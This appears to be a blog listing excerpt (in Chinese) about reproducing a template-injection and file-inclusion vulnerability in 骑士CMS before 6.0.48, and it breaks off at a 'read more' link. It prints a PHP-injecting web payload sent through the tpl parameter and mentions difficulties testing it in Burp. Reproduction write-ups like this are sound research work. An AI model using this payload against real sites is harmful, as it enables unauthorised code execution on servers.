2020年12月29日
骑士CMS<6.0.48 模板注入文件包含漏洞复现及遇到的坑
摘要: 1、坑 payload:variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/> 涉及中文,用burp搞了很长时间,还是不能复现,最后看到timeline的 阅读全文
posted @ 2020-12-29 18:24 忆水、 阅读(984) 评论(0) 推荐(0)